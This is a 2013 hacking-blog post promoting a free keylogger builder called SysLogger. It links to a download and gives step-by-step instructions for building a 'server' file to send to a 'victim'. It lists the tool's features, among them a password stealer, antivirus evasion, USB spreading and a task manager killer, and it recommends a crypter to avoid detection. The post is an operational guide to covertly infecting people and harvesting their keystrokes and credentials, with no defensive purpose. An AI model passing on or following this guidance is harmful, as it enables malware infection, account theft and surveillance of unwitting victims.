Sunday, 1 December 2013

Syslogger [Free]


What’s a keylogger ?

Keylogger is a program which you will send to your victim and once he/she opens it.It will record all the keystrokes  (i.e what he/she types on keyboard) and then it will send those keystrokes to your email account.

How to send keylogger to your Victim?

For this,first you need to download a keylogger software which has the feature of remote installation.There are many keyloggers available on internet (you can google them) but the one I recommend is SysLogger.
It’s an epic keylogger.It has many features like stealing saved passwords,deleting the victim’s cookies,disabling task manager etc.. And the best thing about it is that it’s totally free! :D
It is created by a coder of HF (HackForums).





Screenshot


[Image: taozg.png]

[Image: zz5G9.png]

Antis
[x] AntiAnubis
[x] AntiBitdefender
[x] AntiKaspersky
[x] AntiMalwarebytes
[x] AntiNod32
[x] AntiNorman
[x] AntiOllydbg
[x] AntiOutpost
[x] AntiWireshark

Stealers

[x] Google Chrome (latest version)
[x] Mozilla Firefox (latest version)
[x] Opera (version 10)
[x] Windows Live Messenger (latest version)

Features
[x] Antis
[x] Mail Encryption
[x] Stealers
[x] Cookie Deletion
[x] Download Link Encryption
[x] AV Site Blocker
[x] USB Spread
[x] Startup
[x] Taskmanager Killer
[x] Clipboard Logger
[x] Steam Forcer
[x] Downloader
[x] Fake Error
[x] Melt
[x] Screen Logger
[x] Mutex
[x] Infection Notify
[x] Native Stub
[x] Icon Changer
[x] Auto Updater



Download

http://www.mediafire.com/?nr7j4ke4c6zbezf
Here


  • So download syslogger  keylogger 
  • When you download it,you will get a rar file.Extract its contents.
  • Next,open Syslogger Builder.exe and do all the settings like this :
How-to-use-syslogger
  • Then click on “Build Server” and it will ask  you that where you want to save your server and which name do you want to give it.
  • So give it any name and save it.Now you will get your server file.This is the file that you will send to your victim.

    You can also use a crypter to crypt your keylogger and bypass antivirus detections.



How keylogger works?
Keylogger basically captures every key pressed, and saves it to a text file on your hardisk. Most keyloggers send this text file to your email adress or ftp account.
You can view this text file and search for username and password of facebook/yahoo/gmail etc
Every keylogger comes with a builder, this builder is used to generate server.exe.
In the builder, you select all your desired options, enter your email adress, password to receive the logs. After entering every required thing you generate or build server.exe this is the keylogger that you will use to infect other people :)


Note: Following short terms are used in this thread
FUD = Fully Undetectable on all Antiviruses
UD = Detected by a few Antiviruses
server.exe = Your keylogger file
AV= Anti-virus

Related Posts:

  • Introduction To Armitage in Kali Introduction To Armitage in Kali Armitage is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits … Read More
  • Nmap Commands Top 30 Nmap Command Examples For Sys/Network Admins Nmap is short for Network Mapper. It is an open source security tool for network exploration, security scanning and auditing. However, nmap command comes with lots of… Read More
  • Hack facebook , gmail with Social Engineering Toolkit Social Engineering Toolkit Humans are the weakest link in any security system ~Shashwat (That'll be me) Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness … Read More
  • Hack Windows 8 Java vulnerability Java signed applet Hack Windows 8 Java vulnerability In this tutorial we will look at how difficult it can be to hack modern operating systems.  Hack any Window… Read More
  • Exploiting OpenSSL-Heartbleed Detecting OpenSSL-Heartbleed with Nmap & Exploiting with Metasploit You can now quickly detect the OpenSSL-Heartbleed vulnerability very quickly on a network using the ever popular nmap command, and with the lat… Read More

0 comments:

Post a Comment